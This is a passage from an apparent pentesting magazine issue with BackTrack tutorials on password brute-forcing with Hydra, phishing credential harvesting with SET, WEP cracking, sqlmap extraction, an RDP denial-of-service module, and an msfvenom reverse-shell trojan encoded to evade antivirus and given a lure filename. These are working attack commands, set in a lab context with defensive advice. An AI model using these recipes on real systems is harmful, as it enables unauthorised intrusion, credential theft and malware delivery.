The result will be probably the same but if you try Nmap you will see more information. In addition, it can be quickly implemented to determinate what kind of program is listening over the port discov-ered (-sV) and what operating system is installed (-O). Please, take a look at the Nmap help to learn more options and remember that man command or help are always your friends. If you are afraid to use the Terminal, use the Nmap GUI: Zenmap. You have to remember that every GUI is at least one layer over its command-line program; any-way let's use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9).Scanners make a list of hosts using FTP, another one of hosts using RDP, and so on.

Get the keysWell done! You have completed your basic net-work gathering phase, now you can merge all your lists and launch your first attack.

What do you need? A username list, a file list-ing hosts with the specific service, a password list, and a program to put everything together. You don't have the password list, but one can be easily found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called 'wordlist attack': it is not the most elegant way to perform a penetration test, but it may be very incisive.

The program you can use to join your lists is Hy-dra (or its GUI xHydra). Figure 10 explains how it works.

Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk) and, in the Target tab, insert the target list (e.g. FTP_hosts.txt), the port to test and the protocol (21 / FTP).

The options 'Show attempts' and 'Be verbose' are useful to better understand what the program does.

Go in the Password tab and insert the user and the password lists; don't forget to check 'try login as password' and 'try empty password'. For a ba-sic test dont use Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I Hope you can find some user and password association.

Figure 9. Nmap GUI

Figure 8. Some basic scans using Unicornscan

Figure 10. An operation diagram of the operation of THC-Hydra

OPEN 06/2013

You can also try to extend your lists to have more chances, but remember that such attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours for a word list attack.

Anyway, if you find some associations, write them down and be ready to reuse it: users are used to use the same password for more than one service.

You can start to write a file with user:password, you will use it on Hydra in the Password tab in-stead of users and passwords lists. When you dis-cover a new service, you can first use Hydra with the new file created and then the lists of users and passwords. This will speed up your work.

I hope you now have the user/password to ac-cess the FTP, SMB or, if you are lucky, the SSH, or RDP.

This is not the end of the test, this is the begin-ning. You will use this access to gain more infor-mation and to find more vulnerability all over the LAN.

But what about if you can't find anything? Dont worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploit some vulnerability, or ARP poissoning. There are so many options that the on-ly limit is you and every discovery is the start for the next one.

So when you open a new port, restart from the beginning, restart from sharpenning your axe.

DAVIDE PERuzzIDavide Peruzzi, OSCP certified, is a system administrator and freelance security consultant with about 10 years of experience in Information Technology.

In the last years he focused on vulnerability assess-ments, penetration testing, InfoSec, and NetSec.He can be reached at [email protected].

BACKTRACK


Pentesting with BackTrackPenetration testing, also known as Pentest, is a technique to evaluate the security of computers and networks by performing imitating attacks from external and internal threats. The pentesting process involves statical and dynamical analysis of a system/network in order to reveal potential security issues resulting from improper configurations, hardware/software flaws. These attacks should be executed from the point of view of potential attackers.

During this process, if security issues have brought to the foreground, pentesters tries to exploit them. Successful penetration re-sults are presented to systems owners with recom-mendation to plug that loophole and all the opera-tions to conduct to reproduce the attack.

WarningPlease consider that all materials of this Pentest magazine apparition are intended for educational purposes only. You must not use the skills and in-formation obtain from this reading to attack in any way a system for which you dont have specific authorization or ownership. Reproducing experi-ments that are present in this article on non-au-thorized systems is illegal in most of the world and you will ultimately backstop the consequencesin-cluding very high fine and jail.

Quick overview of BackTrackIn the testing/penetration community, a leader emerges: BackTrack. Since its first release on the 5th of February 2005 by Mati Aharoni, Devon Ke-arns and Offensive Security; BackTrack has be-come a large, stable, and well known distribution for penetration testing. BackTrack is a Debian GNU/Linux based distribution built for specific pur-poses: digital forensics and penetration testing.

BackTrack comes from the merge of two other dis-tributions named WHAX and Auditor Security Col-lection which already was focused on penetration testing. The latest release of BackTrack was pub-lished in August 2012 and is named BackTrack 5 R3. Here's a non-exhaustive list of backtrack tools categories:

Information gathering; Vulnerability assessment; Exploitation tools; Privilege escalation; Maintaining access; Reverse Engineering; RFID tools; Stress testing; Forensics; Reporting tools; Services; Miscellaneous.

Installation and ConfigurationIn order to follow our step-by-step tutorials and hands-on recipes, you must have an access to three different virtual machines: one with BackTrack, one with Windows 7 and later with Windows XP.

We consider that you have a brand new installa-tion of BackTrack. If not, you can download the lat-

Article comes from Pen Test Extra.



est version following this link http://www.backtrack-linux.org/downloads/. In order to be comfortable, youll need to create a partition of, at least,16 GB.

After the end of the installation, BackTrack will reboot and youll be able to log as root user (bt log-in: root/Password: toor). A prompt will appear and in order to launch the GUI, type startx.

If you want to try this experiment by yourself, youll need to purchase Windows 7.

Here is an advice: use a hypervisor like Vir-tualBox because its easier to install an OS and it avoids you to create a native partition on your computer; you will gain some precious time!

In my case, I run the two OS on the same laptop using Oracle VirtualBox (see Figure 1).

After the installation, we must set up the net-work parameters because they must commu-nicate together through the network. For Win-dows, just click on the two little screens on the container of the operating system (on the bot-tom right corner). Then click on 'Network Adapt-ers' and set up the adapter in 'Bridge Adapter' rather than 'NAT'. In my case, the name of the bridge adapter is 'en0: Ethernet' because I use this device to be able to contact the other ma-

chine (and the Internet). Repeat this step for BackTrack (see Figure 2). Now, its time to check if the two machines can see each other: launch a terminal on the two VM and exec the command ipconfig on Windows and ifconfig on BackTrack. Note: you must probably restart the networking daemon, otherwise the new configuration wont take place:

/etc/init.d/networking restart

Figure 2. Network configuration of Windows 7 and BackTrack 5

Figure 1. Windows 7 and BackTrack 5r3 side by side

Figure 3. Ping command in BT terminal

BACKTRACK


You will see the IP address of each VM. Then ex-ecute a ping command on BackTrack using the IP address of the Windows VM (see Figure 3). In my case, the IP address of my Windows is 192.168.1.119 but it will be different for you:

ping 192.168.1.119

A ping is a special network packet called ICMP request that sends an echo packet and wait for an echo reply.

Social Engineering ToolkitIn this part we want to show how to use the So-cial Engineering Toolkit. First, to resume what are social engineering attacks. It is the art of manipu-lating people into performing actions or divulging confidential information.

The Social Engineering Toolkit (SET) has ap-peared in BackTrack 4 and it was written by Da-vid Kennedy. SET is an open-source Python tool aimed at penetration testing around Social-Engi-neering. You can find more information about SET on the home page http://www.secmaniac.com.

ExploitIn this case we use SET to create a fake website to harvest credentials.

Run Social Engineering Toolkit using the Back-Track menu (see Figure 4).

Make sure that Metasploit and SET are up to date using options 4 and 5 in the SET terminal menu. Select number 1 'Social Engineering Attacks'. Select Website Attack Vectors (see Figure 5). In the first part we use Credential Harvester Attack Method (option 3). At this moment SET of-fers three options. Use a pre-defined template as Face-book, Gmail, etc. Clone an ex-isting site or import a custom HTML file. We use the first op-tion to make the tutorial easier to follow. Now, we have the choice to specify a local IP address or external IP address. In this tutorial we use a local address Figure 6. Know your IP address

Figure 5. Website Attack vector

Figure 4. Social Engineering tool


(to know your IP address, use ifconfig com-mand in terminal menu; see Figure 6).

Select Gmail in the next menu and press Enter. Now open Firefox at localhost:80 (see Figure 7). When you use the form to authenticate the us-

er on Gmail, you can see all information about the user in the SET terminal (see Figure 8).

The process generated two reports html and xml files in /pentest/exploits/set/reports/ (see Figure 9).

how to protect against social engineering?This type of attack is generally used by a hacker in the email. To prevent social engineering attacks, its really important to teach people about phish-ing, using https, unmasking spam, and verifying the identity of the speaker.

2 Wireless and BluetoothWireless WEP 802.11 Security

To test the security of your wireless network, we need the aircrack-ng package (formerly aircrack). This package exists for Windows and Linux and you can find it at http://www.aircrack-ng.org/. Back-Track is more specialized in security, and the pack-age is included with all drivers for wifi-cards.

Aircrack is software to crack WEP 802.11. He us-es the attack named Fluhrer-Mantin-Shamir (FMS) and other attacks created by Korek. When enough packets are captured, Aircrack could instantly find the wireless key.

The aircrack package contains several programs and the three main areas:

Airodump-ng: software that makes packet cap-ture, scans the networks, and keeps the pack-ets that we use to decrypt the key.

Aireplay-ng: the main function about this soft-ware is sending packets to stimulate the net-work and capture more packets.

Aircrack-ng: is used for cracking the key-pass, it uses packets capture through air-pump.

For confidentiality the names of all networks about ESSID (Extended Service Set Identifier) were hid-den. Also the Mac address BSSID (Basic Service Set Identifier) has been partially censored.

Start by checking if your wireless card is al-lowed to inject packets: http://www.aircrack-ng.org/doku.php?id=compatible_cards

Figure 10. Airmon-ng

Figure 9. Reports

Figure 8. Information about the user

Figure 7. Gmail at localhost:80

BACKTRACK


Open the terminal and use the command 'air-mon-ng to list the cards available (see Figure 10).

The MAC address is the ID of your wireless card. When a hacker attacks a wireless he usually changes it, to hide his identity. First, we disable the wireless card, and then we change our MAC address with macchanger command (see Figure 11). Normally, you work on your network and this step is not really important but its important to understand the technique.

Now we use airodump-ng wlan0 to scan the networks. Airodump scans the entire channel and show all AP (Access Point) available (see Figure 12).

The PWR column correspond to signal pow-er, if airodump has a problem to define it if dis-plays -1. The Beacon column corresponds to a frame transmitted periodically to announce the presence of a Wireless LAN. It is not im-portant to crack a WEP key. The column CH indicates the channel of the AP.

The column #Data is the key to cracking the Wireless security with WEP. The principle of using Aircrack to crack the WEP key is catch-ing initialization vector (IV). IVs can be found during the exchange of data. The conclusion is simply more data = more IVs exchange = more simple to crack a WEP key.

Use CTRL+C to stop scanning. For the best performance and to scan only the

target network, use the next command to filter its BSSID (see Figure 13):

Airodump-ng -c (channel) -w (filename) --bssid

(BSSID) (interface)

Where: Channel corresponds to the target channel; Filename is the name of your trace file; BSSID corresponds to the target BSSID; Interface is your interface.

This step is not essential, it tests if the access point has a MAC address filter, but the protocol is not reliable and if you have an error mes-sage or timeout, dont panic. Open a new tab in the terminal console and enter this command (see Figure 14):

aireplay-ng -1 0 -a (BSSID) -h 00:11:33:44:55 -e (ESSID) (interface)

Where: BSSID corresponds to the target BSSID; ESSID corresponds to the target ESSID; Interface is your interface.

Now we want to inject traffic to increase da-ta on the network and facilitate WEP crack-ing. We must have 100 000 IVs to cracking the WEP key, and the best attack to generate IVs is the 're-injection ARP attacks' specified with the number 3. Hit the following command to force some traffic (see Figure 15):

aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

Figure 12. Airodump

Figure 11. Change your mac address

Figure 16. Key found

Figure 15. Aireplay

Figure 14. Aireplay command

Figure 13. Airodump

TABLE OF CONTENTSINTRODUCTION TO BACKTRACK

BackTrack for Pentesting?By Lloyd Wilke

BUILDING YOUR LAB

From The Beginning: Building an SQLi LabBy Guglielmo Scaiola

How to Set Up a Software Hacking Lab Part 1, 2, 3By Steven Wierckx

MULTIPHASE TESTING

Sharpen your Axe with BackTrackBy Davide Peruzzi

Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and ArmitageBy Lance Cleghorn

BackTrack 4: Target ScopingBy Shakeel Ali, Tedi Heriyanto

TOOLS

Metasploit PrimerBy George Karpouzas

Metasploit for Exploits Developement: The Tools Inside the FrameworkBy Guglielmo Scaiola

Hacking Wireless in 2013By Terrance Stachowski

Automating Exploitation with MSFCLIBy Justin Hutchens

Nikto: How to Launch Mutation TechniqueBy Ankhorus

MsfPayload & MsfEncodeBy Pankaj Moolrajani and Hitesh Choudhary

Compromising Passwords With the Next Generation of Backtrack: Kali LinuxBy Joseph Muniz

PenTempest on WordpressBy Massimiliano Sembiante

SCENARIOS

Pentesting with BacktrackBy Mathieu Nayrolles, Mathieu Schmitt, and Benot Delorme

Guide to BackTrack 5: Attacking the ClientBy Vivek Ramachandran

Taking Over an Active DirectoryBy Gilad Ofir

MS Internet Explorer Sam ID Property Remote Code Execution VulnerabilityBy Praveen Parihar

BUY NOW

TRIAL

BACKTRACK


Where: BSSID corresponds to the target BSSID;

After this command normally the number of #Data in your first command line is increasing step by step.

Finally, to crack the wireless key network we open a new terminal and we use this command to start aircrack-ng:

aircrack-ng -b (BSSID) (filename-01.cap)

Where: BSSID corresponds to the target BSSID, filename-01.cap is the name specified during

step 6, followed with -01.cap; corresponds to the first tracefile.

Aircrack continue to update the IVs number captured by airodump and generated by air-play.

After a few minutes, WEP key should appear by itself if the crack works (see Figure 16).

The network has changed the key, but you should know because you are the AP owner.

The captured file is corrupted.

how to protect against Wi-Fi penetration?To prevent this kind of attack you can change your wireless key encryption to WPA2 encryption. If this does not cause accessibility problems, use com-plex password (numeral, letter, uppercase letter, symbol) to increase cracking complexity.

Bluetooth security There are various hacks and a lot of software al-ready available on the different website which help hackers to hack any cell phone and multimedia phones with Bluetooth. But actually a lot of man-ufacturers have close security vulnerabilities. In this article, we have outlined only some Bluetooth hacking software and presented how to set them.

The first time we set up our Bluetooth equip-ment, we open a terminal and take this com-mand:

hciconfig hci0 up

Where: hci0 corresponds to your Bluetooth interface. Now you should have your adapter up and

working. To verify that all is 'OK' hit this com-mand: hciconfig -a (Figure 17).

Now we want to scan and fingerprint a Blue-tooth device. Fingerprinting is a term we use for profiling a device, and to do this BackTrack has a collection of tools called Bluez. Bluez is a standard Bluetooth package for Linux. In this part we use hcitool to scan devices that are broadcasting. We scan using hcitool with the following command (see Figure 18):

Figure 18. hcitool scan

Figure 19. sdptool

Figure 17. hciconfig -a


hcitool scan

Stop scanning when it shows your device and note its MAC address. Now, we use sdptool to browse our device for open channels and tell us what services are available on which chan-nels (see Figure 19).

sdptool browse Mac_address

Where: Mac _ address is your mobile MAC address.

Now, we search our HCI daemon configuration file (generally in /etc/bluetooth/hcid.conf) and replace all the lines from Listing 1.

We restart our Bluetooth device with bash /etc/rc.d/rc.bluetooth restart

We can now set up our devices. First one is RFCOMM0 and is on channel 3 DUN Dial up, second is RFCOMM1 and is on channel 6 FTP, and the third is RFCOMM2 and is on channel 7 OBEX push.

mknod -m 666 /dev/rfcomm0 c 216 3mknod -m 666 /dev/rfcomm1 c 216 6mknod -m 666 /dev/rfcomm2 c 216 7

Its time to connect it with sdptool (see Figure 20).

sdptool add --channel=3 DUNsdptool add --channel=7 OPUSHsdptool add --channel=6 FTP

At this time, we have scanned Bluetooth broad-casting, identified what is the channel/services, and configured our network card. Normally you are ready to attack your mobile. In this article, as we have previously said, we do not present at-tacks because our device is not vulnerable. But if you would like to know more about it, you can search Bluebugger and Bluesnarfer attacks.

Prevent Website AttacksScanning Joomla CMS with JoomscanJoomla is a free and open source content man-agement system (CMS) for publishing content on the World Wide Web and intranets. The principle is simple: you can download the archive on the offi-

Listing 1. HCI daemon configuration file

autoinit yes;passkey "1234";security auto;name "bt1";iscan enable; pscan enable;lm accept,master;lp rswitch,hold,sniff,park;auth enable;encrypt enable;

Figure 21. CMS Vulnerability

Figure 20. sdptool

BACKTRACK


cial Joomla website http://www.joomla.org/ and af-ter the installation, you have set up your website and can start publishing content (follow the doc-umentation to know how to install Joomla http://docs.joomla.org/).

To show how important it is to stay up-to-date CMS, we voluntarily use an old version of Joomla (download Joomla_1.5.26). In this case, we have hosted an Apache server and mysql using Lamp http://en.wikipedia.org/wiki/LAMP_(software_bun-dle). Joomla is available on our local network at 192.168.1.3/joomscan/. On the other side we use the last version of BackTrack 5R3 to scan vulner-abilities of Joomla 1.5.26.

Start BackTrack Open the jomscan tools (you will find them in

BackTrack menu; see Figure 21). To run the joomscan script use this command

(see Figure 22):

./joomscan.pl u (String)

Where: STRING corresponds to our Joomla URL web-

site. In this example the website is placed at 192.168.1.3/joomscan/

After few seconds, we can see apache and Joomla version analyzed by joomscan and all included website modules. As we can see, the mentioned version is not the same, here the range 1.5.12-1.5.14.

We can explain fail by the techniques used by joomscan to analyze the version. Indeed, joomscan analyzed the header in the .ini file in-cluded in Joomla and sometimes is not up-to-date. However, the analysis can help you un-derstand security in the CMS world.

After a few minutes, Joomscan has analyzed all vulnerabilities on your website and thought us if our version has been concerned (see Figure 23).

Now we can follow the 'Exploit' instruction to throw an exploit on our Joomla website.

If you would like to prevent attacks on your Joomla website, you can hit this command: ./Joomscan. pl defense and follow the instructions to make your CMS more secure.

how to protect against Joomla vulnerabilities?The best technique to prevent attacks on CMS is to keep your version up-to-date and regularly use joomscan when you install a new module.

SQL injection with sqlmapSQL injection is a code injection technique that ex-ploits security vulnerability in an applications soft-ware. SQL injection is mostly known as an attack vector for a website but can be used to attack any type of SQL database.

If you would like to know more about SQL inject-ing, read this great website: http://www.unixwiz.net/techtips/sql-injection.html.

Figure 23. Vulnerability on Joomla

Figure 22. Running Joomscan


SQLMAP is an automatic SQL injection and da-tabase takeover tool and it included in the last ver-sion of BackTrack. In this section we analyze a vul-nerable PHP script; we use SQLMAP and extract database information.

Download the sample website http://www.ma-thieu-nayrolles.com/pentestmag/victim/sam-ple-site.zip (index.php and db.sql); it is vulnera-ble to SQL injection.

To install the sample we simply put index.php in our localhost directory 192.168.1.3/phpmy-admin and we create a new database named sql _ injection. Then, we import the db.sql file to the database.

When everything is ok, we open a browser and verify if the site is up (see Figure 24).

http://192.168.1.3/testsql/?&name=ben&password=azerty5

Where: 192.168.1.3 corresponds to apache server

IP address; /testsql corresponds to the path where we

put the website: index.php;

name=ben is the first GET argument used in mysql query and corresponds to the user name;

Password = is the second GET argument used in mysql query.

Now, we start sqlmap in the BackTrack menu (see Figure 25).

Then we run the command pictured in Figure 26. After a few minutes, sqlmap shows vulnerabil-

ity in the parameter name and display all data-bases (see Figures 27, 28).

Now we can execute the SQL injection. To per-form this exploit, execute the following com-mand (see Figure 29):

Python ./Sqlmap. py -u 192.168.1.3/test sql/index.php?name=ben -D sql_injection -T user --columns

Where: -D sql _ injection corresponds to the data-

base named sql_injection created in step 2;-T user is used to select the table user in the

sql_injection database;--Columns is the argument used to take col-

umns off the table. Sqlmap reveal 3 columns: id, name and pass-

word (see Figure 30). Now, we execute a query to get the password simply with a username (see Figure 31, 32).

how to protect against SQL Injection?The best technique to prevent SQL injection is to protect your mysql query with mysql_real_escape_string() http://php.net/manual/en/function.mysql-real-escape-string.php or to use PDO library http://ca1.php.net/manual/en/class.pdo.php.

Figure 24. SQL Injection

Figure 28. SQL vulnerabilities

Figure 27. SQL vulnerabilities

Figure 26. Run SQLMAP

Figure 25. SQLMAP

BACKTRACK


Vulnerabilities exploit on Win7In this case study, we will learn how to penetrate Microsoft Windows 7. Nowadays, companies are still struggling to recognize the overwhelming ben-efits of the latest release of Microsoft. Indeed, pro-ceeding to a worldwide migration led to incommen-surable direct investments, licenses, and long-term commitment formation. Considering these well-known facts, we will base our experiments on Win-dows 7 instead of Windows 8.

In order to perform this case study, we will use the Metasploit framework. Metasploit is the perfect toolkit for pentesting.

What will you learn:

How to use Nessus and Metasploit; Exploit DOS on Windows 7; How to create a Trojan for Windows 7.

Now, we will focus on Nessus. It is a vulnerabili-ty scanner that allows you to scan a network and discover some flaws in the operating system ser-vices misconfiguration. Even if there are some packages provided by BackTrack, you need to download the latest version of Nessus:

In the terminal, write apt-get install Nessus; Then, you must activate your Nessus version

following this link: http://www.tenable.com/products/nessus/nessus-homefeed;

You will receive your key by email. Copy this key and write the command below: /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx where xxxx represents the key. If everything is ok, youll see this mes-sage: 'Your activation code has been regis-tered properly thank you';

After that, you need to create a user for Nes-sus: /opt/nessus/sbin/nessus-adduser;

Choose a login and password, and say yes when Nessus asks you if you want to create an 'admin' user (see Figure 33);

Finally, you need to start the Nessus daemon entering /etc/init.d/nessusd start;

Nessus gives you the opportunity to use a GUI on a web browser. Run Firefox and go to https://localhost:8834/. The connection re-quires https because all the communication is encrypted using SSL/TLS.

Now everything is set up to have some pentest fun on Windows 7.

Exploit 1: DOS on Windows 7For this first exploit, we want to create a denial of service on a remote host. A DOS happens when a malicious intruder wants to stop a specific process (or all process) on a remote computer or server. This type of attack can target email services or websites, and are performed by using flooding or a flaw in a program or service. In our case, we will crash the remote computer by exploiting a flaw in the Remote Desktop Protocol. RDP is very useful

Figure 33. Run nessus as Admin

Figure 32. SQLMAP Dump results

Figure 31. SQLMAP dump command

Figure 30. SQL Map results

Figure 29. SQLMAP command sample


to take control of a user session remotely. For in-stance, an administrator can help a user to solve a problem or you can help your mother set up her new printer. By default, RDP uses the port 3389. Since we have a fresh Windows 7 installation, the first thing to do is to activate this service. This is very easy: click the start button, right click on Com-puter, Properties. On the left panel, click Remote Settings and then click the radio button 'Allow con-nections from computers running any versions of Remote Desktop'. This exploit doesnt work for the third item, because it uses NLA authentication mode that is more secure than the second one.

Before we start, lets take a look at our roadmap. First, we will perform a kind of pre attack by scan-ning our entire network and see what hosts are con-nected. Then, we will choose a target, find some flaw using Nessus, and then we will be able to per-form the crash of the system using the Metasploit framework. Nmap is a tool designed to scan a range of addresses or a specific target. We want to discov-er if there are any Windows in our network.

In order to discover the entire host on this network, type nmap -sP 192.168.1.0-255 (see Figure 34).

The -sP parameter means that we only want to show alive hosts.

There are some hosts connected to the network, but no Windows 7. However, there are a few un-known hosts. So we can gather more information about them by writing nmap -O ip_address where ip_address represents the IP of the target to scan. Lets try with nmap -O 192.168.1.119 (see Figure 35).

The result indicates that a Windows 7 is online on the network! Moreover, nmap has detected some open ports.

Its important to know if there is a possible way to hack our Windows. Here comes Nessus.

Once you are logged, we will create a new scan (under the Scans tab and clicking add button).

We name our Scan Win7 Scan, and we set the policy to Internal Network Scan. Under the Scan targets box, you can choose a range of IP ad-dresses (for example 192.168.0.0/24) but we want to target a specific host, so we need to use the one provided by nmap: 192.168.1.119 (see Figure 36).

Launch the scan. After a while, you will see the results (see Figure 37).

According to the scan, there are two potential high threats for our Windows. Lets go deeper. By clicking the first result (SVC Name msrdp on port 3389), youll learn a lot of things about this vulner-ability, for instance a description, the solution to protect against it if the flaw is exploitable and the Common Vulnerability ID (CVE).

The Metasploit website provides a database for auxiliary and exploit modules (www.metasploit.com/modules/).

By entering the right CVE (CVE-2012-0002 in our case) on the field, we discover that there are

Figure 37. Nessus results

Figure 36. Nessus GUI

Figure 35. Nmaps results

Figure 34. nmaps results

BACKTRACK


exploits for this kind of vulnerability. By clicking the link 'MS12-020 Microsoft Remote Desktop', Metasploit gives you all the information to exploit this vulnerability (see Figure 38).

Now its time to attack our Windows. On BT5, the first thing to do is to launch the msfconsole. Its a popular interface of Metasploit. It provides an 'all-in-console' and allows you to access a wide range of options. Exec msfconsole. A msf prompt will appear. Then, we must set the good payload. According to the Metasploit website, we will use ms12_020_maxchannelids (see Figure 39) :

use auxiliary/dos/Windows/rdp/ms12_020_maxchannelids

If you type show options, youll see all the require-ments needed by the payload to perform the at-tack. You need to set the RHOST corresponding to the remote host, out Windows 7.

Write set RHOST 192.168.1.119 on the console. The show options command proves to us that the target is correctly set (according to the figure below).

Everything we need to perform in this penetration is ok, so the last thing to do is launch the exploit!

On the BackTrack5 Terminal, just write exploit and see the result on your Windows (see Figure 41)!

As you can see, the Windows have just crashed (see Figure 41)!

BackTrack 5 shows us that the payload has worked successfully (192.168.1.119:3389 seems down) (see Figure 42)!

When you want to discover some flaws on a re-mote system, repeat these three steps very effi-cient and pretty easy.

Exploit 2: Creation of a Trojan to get access to a remote computerThe first exploit was fun, but now we want to have complete access to the remote host!

In this scenario, we will use Social Engineer-ing to send a malicious program to a user running Windows 7.

Heres the roadmap of our experiment: First, we will use msfvenom to create our payload to send to the target. Second, we will create a handler in order to await a possible response of our target. Finally, we will perform some actions on the remote host.

Step 1: Generation of the payloadWe will use msfvenom which is a combination of msfpayload and msfencode. Msfpayload is a tool specially designed to generate all the shellcode available in Metapsloit. Msfencode is a little tool that can help with encoding.

We will use a reflective DLL injection: its a tech-nique employed to perform the loading of a library

Figure 38. Search for exploit

Figure 39. Use auxiliary command

Figure 40. Show option command

Figure 41. Windows 7 Crash

Figure 42. Module Execution complete

Is your Car Unhackable?Your job is to find vulnerabilities and to patch them. Amounts of work, various projects, pending contracts, innumerous commitments. Still, it seems that you can shut your laptop and get unplugged. Drive home, go shopping, take your family to cinema.Yes, you can. But you do not drive a car any more. You sit in a device, a totally and easily hackable set of applications. Have you thought about that? Has anyone bothered to pentest your car? Are the super secure automating driving and parking systems really secure?

Build your Own Pentesting WorkshopWeb & Mobile Applications Pentesting ToolkitWhat tools to use for pentesting web and mobile applications? Which are the newest? Which are the best? Complete your own pentesting workshop for every operating system. Inside you will find: - how to use SQLMap? Do you know its full possibilities? - the USB Rubber Ducky The Penetration Testers USB - how to use the new deft8 in pentesting and much more!Check out the newest trends and releases in penetration testing world together with PentTest Magazine!

Secret Pentesting TechniquesEverybody has a best friend. You certainly know that feeling when he or she tells you something that nobody else is aware of. Something you cannot tell anybody. Something exclusive, for your ears only. Something that makes you unique, some might say better than others. Today, PenTest magazine becomes your best friendWe will reveal the deepest secrets of pentesting.

Cloud PentestingThis time we are preparing for you a magazine devoted to Cloud Pentesting. We have already written about it, but due to with your suggestions and needs, we decided to return to this subject in order to update all the information on it, collect new experiences, share with you professional tips and advice. Also, theres a growing interest in this subject and our cooperation with SC Magazine whos organizing eConference on cloud security was another crucial motivating idea.Do you want to see whats new in Cloud Pentesting? Check how to protect your Cloud better basing on the experiences of others!This issue will be published in a month, but now you can buy it cheaper! PREORDER CLOUD PENTESTING! Now it costs 15$ only! Do not hesitate!

Build your Own Pentesting CompanyWhat are perspectives of small pentesting companies? Is it possible to be one-man pentesting company? On which markets new companies should look for their chances? What are the legal issues when building/managing a pentesting company? What hardware/software should you invest in? What kind of people should you look for and where to find them?Now is the time to ask these questions and to get answers for them! Since in the 1st issue our authors shared with you their thoughts on how to begin a pentester career, in both, the 1st and the 2nd issue you could read about Nessus, BackTrack, SHODAN, Owasp A10, Social Engineering, IDS, AD and more, and since the 3rd issue will be devoted to tools and techinques too, you should definitely read Build your own Pentesting Company afterwards and learn how to build your market position!

Analyze and ReportHave you ever done an astounding job but your employer was not satisfied with it?Maybe you had some problems with preparing a report after a conducted pentest?Even the greatest pentesters have this kind ofdifficulties and they struggleimmensely to find a solution.In this upcoming issue we willexhaustively explain how pentester should prepare a paper after an executed test. You will learn things which will definitely please your employer and he will not complain ever again.If you are an employer yourself, you might be also interested in this number. We will describe a lot of important facts which you must know to hire an amazing pentester.

DISCOVER PENTEST PREORDERSINTERESTED IN ONE OF THE ISSUES? CLICK ON THE COVER!

BACKTRACK


into a host process, here the TCP. TCP belong to the Internet protocol suite and can perform a reliable and error control connection between two hosts.

In the BackTrack terminal, write msfvenom -p Windows/meterpreter/reverse_tcp -o in order to view all the options you need to fill for generating the Trojan wellm (see Figure 43). You need to pro-vide some information like your local IP address (LHOST). If you cant remember it, type ifconfig on the terminal. In my case, its 192.168.1.132. We will also change the listening port (LPORT) to 443, because a firewall or a router is more prone to ac-cept this kind of stream. In order to generate and output the malicious file, write this command:

msfvenom -p Windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b \x00 LHOST=192.168.1.132LPORT=443 -f exe > hot_girls_screensaver.exe

Here are some explanations:

-e x86/shikata _ ga _ nai is an encoder which performs some permutation and substitution through the block in order to bypass a spam fil-ter or an antivirus;

-i 5 encode the content of the payload 5 times;-b \x00 avoid this character on the payload

(NULL) in order to avoid the premature end of a code;

-f exe means that the output format will be an ex-ecutable file;

hot _ girls _ screensaver.exe is the name of the output (we decided to choose an attractive file-name to get a better result; see Figure 44).

Now, with this executable you can gain access to a remote computer by reversing the connection!

If you list the directory (ls), you will see our Tro-jan. Then, you must send this exe to your Windows 7. In real life, to perform such a thing, youll prob-ably need to use some social engineering tricks in order to force a user downloading your trojan. But dont forget thats illegal.

Step 2: Wait for a remote execution of the payloadIn BT5, you must use the generic payload handler. This module lets you use all the features from the payload launch outside the framework.

Write use exploit/multi/handler and according to our purpose, we need to set a reverse_tcp pay-load. Its necessary to execute the command be-low (see Figure 45):

set payload Windows/meterpreter/reverse_tcpshow options

As it is shown on the screenshot, we need to con-figure the local host and the local port:

set LHOST 192.168.1.132set LPORT 443

Then we can run the reverse handler by typing exploit (see Figure 46).

Now, Metasploit is waiting for an incoming con-nection from a potential victim. In real life, you dont know when a potential user will execute the malicious file, so be patient!

Figure 43. msfvenom command

Figure 44. msfvenom results

Figure 47. Trojan execution results

Figure 46. Executing the reverse handler

Figure 45. PayLoad configuration


Step 3: Lets execute the Trojan.Its time to double click the exe file in our Windows 7 (see Figure 47).

Once the remote user launches the payload, a meterpreter prompt appears; that means that you have complete access to the remote host! Meter-preter provides some powerful tools for executing remote code.

When you hit the key, all the activities that you are able to perform are listed.

First of all, we must know who is running our pay-load. Thus, we must enter the command sysinfo (see Figure 48).

As we can see on the screenshot, all the infor-mation about the remote hosts are displayed!

Lets go further and see how many processes are running on the remote host. Type ps (see Figure 49).

You will see the entire process list. Now the us-er probably thinks that your screensaver doesnt work. If he is skilled, he probably wants to kill the process of the Trojan. In order to stay connected, a smart thing to do is migrating our meterpreter pro-cess to another one. We will choose explorer.exe because its a generic process managing the GUI of Windows. To do this, locate the process identi-fier (PID) of explorer.exe and typ

pentest mag 2013 07

Documents